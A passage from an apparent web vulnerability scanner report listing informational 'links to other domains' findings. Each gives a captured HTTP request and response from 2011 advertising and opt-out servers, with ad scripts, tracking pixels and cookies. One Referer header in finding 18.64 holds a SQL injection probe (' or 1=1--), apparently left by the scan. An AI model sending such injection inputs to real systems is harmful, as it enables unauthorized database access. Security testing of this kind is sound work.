Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=83e0f8336bb36aba6f4b9bf3f72d

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=8436053a140c7d8ad92ac8e95005; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:41:13 GMT
Content-Length: 1300

document.write('<div style="z-index:10; position:relative; width:728px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&p
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176624&bid=1043702&lid=24536" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110917124114&cmxid=2101.020017662401043702xmc" style="display: none" height="1" width="1" border="0" />');var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
18.56. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=24537&sz=300x250&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295043061%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F&r=http%3A%2F%2Fwww.seattlepi.com%2F&rnd=920257 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295043061&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=8335ff53b00524f964d967e96250

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=849ec9c3dd18d6b098300dde7b92; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:48:22 GMT
Content-Length: 1520

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=24537;c=177141;b=1049887;ts=20110917124823" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="
...[SNIP]...
</ifr" + "ame>");var ord=Math.random()*10000000000000000;document.write("<img src='http://p.opt.fimserve.com/bht/?px=3140&v=1&rnd=" + ord + "' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://p.opt.fimserve.com/bht/?px=3140&v=1&rnd=" + ord + "' width='1' height='1' />");var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24537&campId=177141"></script>
...[SNIP]...
18.57. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?l=24536&sz=728x90&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F728x90%2Fht_1064834_61686626%3Ft%3D1316295397553%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252Fflashtalking%252Fftlocal.html%253Fifsrc%253Dhttp%25253A%25252F%25252Fa.flashtalking.com%25252Fxre%25252F18%25252F189583%25252F237666%25252Fjs%25252Fj-189583-237666.js%2526click%253Dhttp%253A%252F%252Fmpc.mxptint.net%252F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%25253f%2526ftx%253D%2526fty%253D%2526ftadz%253D%2526ftscw%253D%2526cachebuster%253D272524.66208301485%252526ftguid%25253D1343AC00FD7B0F%252526ftcfid%25253D237666001%252526ftoob%25253D%252526ftsg%25253Dadg%26refer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F610%252Fhearst%252F300x250%252Fht_1064834_61686626%253Ft%253D1316295375688%2526tz%253D300%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526url%253Dhttp%25253A%25252F%25252Fwww.seattlepi.com%25252F%2526refer%253Dhttp%25253A%25252F%25252Fwww.seattlepi.com%25252F&r=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&rnd=464496 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295397553&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295375688%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=838a74cddbeb6ddecfad61578129

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=83e0f8336bb36aba6f4b9bf3f72d; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:35:25 GMT
Content-Length: 808

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24536&campId=176942"></script>
...[SNIP]...
18.58. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295397553&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295375688%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=83e0f8336bb36aba6f4b9bf3f72d

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=84e869bfe0b4863dcef753150272; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:53:23 GMT
Vary: Accept-Encoding
Content-Length: 1845
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:728px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917125324%3Bdct=;ord=1316278404?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917125324%3Bdct=;ord=1316278404?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];ord=1316278404?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];ord=1316278404?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176942&bid=1044949&lid=24536" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110917125324&cmxid=2101.020017694201044949xmc" style="display: none" height="1" width="1" border="0" /><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24536&campId=176942"></script>
...[SNIP]...
18.59. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/v=5;m=3;l=24537;c=176942;b=1044948;ts=20110917124135 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27704D7D_10F5909%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=284706.307342276%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=8436053a140c7d8ad92ac8e95005

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=843b4712134f40e3eed737c2bff8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:41:35 GMT
Vary: Accept-Encoding
Content-Length: 1731
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:300px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=;ord=1316277695?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=;ord=1316277695?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];ord=1316277695?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];ord=1316277695?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176942&bid=1044948&lid=24537" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110917124135&cmxid=2101.020017694201044948xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...
18.60. http://amch.questionmarket.com/adscgen/d_layer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:58 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Content-Type: text/html
Content-Length: 12137

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
_InsertSwf() {
   if (DL_FlashInstalled()) {    // Make sure the browser can handle Flash.
       // Inside the DIV tag: the object. Outside: nothing; Flash handles its own click events.
       DL_InsertObject('', '<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=3,0,0,0" WIDTH="'+DL_ImgWidth+'" HEIGHT="'+DL_ImgHeight+'" id="DL_object"><PARAM NAME=movie VALUE="http://amch.questionmarket.com/static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf?clickTag=JAVASCRIPT:DL_GotoSurvey();&clickTag2=JAVASCRIPT:DL_Close();">
...[SNIP]...
18.61. http://as.serving-sys.com/OptOut/nai_optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /OptOut/nai_optout.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /OptOut/nai_optout.aspx?verify=1 HTTP/1.1
Host: as.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:40 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/optout/opt_success.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>
18.62. http://as.serving-sys.com/OptOut/nai_optout_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /OptOut/nai_optout_results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /OptOut/nai_optout_results.aspx?nocache=0.7332258 HTTP/1.1
Host: as.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:44:01 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.63. http://as1.suitesmart.com/102386/G14531.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /102386/G14531.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /102386/G14531.js?GID=14531 HTTP/1.1
Host: as1.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/UJ3/iview/295138956/direct/01/6447245?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B234716514%3B0-0%3B1%3B33263296%3B4252-336/280%3B40530567/40548354/1%3B%3B%7Eokv%3D%3Bsz%3D336x280%3Btile%3D2%3Bpos%3D4%3Bsite%3Dseventeen%3Bsect%3Dindex%3Bsub%3Dindex%3Bsubsub%3Dindex%3Bpage%3Dhomepage%3Bcat%3Dother%3Bsubcat%3D%3Btool%3Dros%3Bartid%3D%3Bkw%3D%3Ba%3D%3Bb%3D%3BmtfIFPath%3D/cm/shared/admeld/%3Bgame%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G14853=C1S98373-1-0-0-0-1315398787-0; G15493=C1S99917-4-0-0-0-1315313090-907727

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 01 Aug 2011 18:09:12 GMT
ETag: "118071-e42-4a975873c8200"
Accept-Ranges: bytes
Content-Length: 3650
Content-Type: application/x-javascript
Date: Sat, 17 Sep 2011 16:39:32 GMT
Connection: close
Cache-Control: no-store

var _fSet={red:{14531 : 0},map:{},tgi:null,pnp:{},pix:0};function _FGet(){var jTags=document.getElementsByTagName('script');var jTag=jTags[jTags.length-1];var isFTG=(jTag.src.match(/suitesmart.*\/[0-9
...[SNIP]...
;this.no5e=this.tP['NO5']?this.tP['NO5']:0;}function _FtG5(s,g){var o=document.createElement('DIV');o.style.width='0px';o.style.height='0px';o.display='inline';o.style.position='absolute';o.innerHTML='<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="0" HEIGHT="0" id="_f5e"> <PARAM NAME="movie" VALUE="'+s+'/_f5e.swf">
...[SNIP]...
18.64. http://choice.atdmt.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.atdmt.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7795222 HTTP/1.1
Host: choice.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060'%20or%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.microsoft.com/AdvertisementChoice/opt.out?Verify&nocache=0.7795222
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 17:37:25 GMT
Content-Length: 201

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.microsoft.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7795222">here</a>.</h2>
</body></html>
...[SNIP]...
18.65. http://choice.atdmt.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.atdmt.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.8079951 HTTP/1.1
Host: choice.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.microsoft.com/AdvertisementChoice/opt.out?Verify&nocache=0.8079951
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 16:47:03 GMT
Content-Length: 201

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.microsoft.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.8079951">here</a>.</h2>
</body></html>
...[SNIP]...
18.66. http://choice.bing.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.bing.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.8079951 HTTP/1.1
Host: choice.bing.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
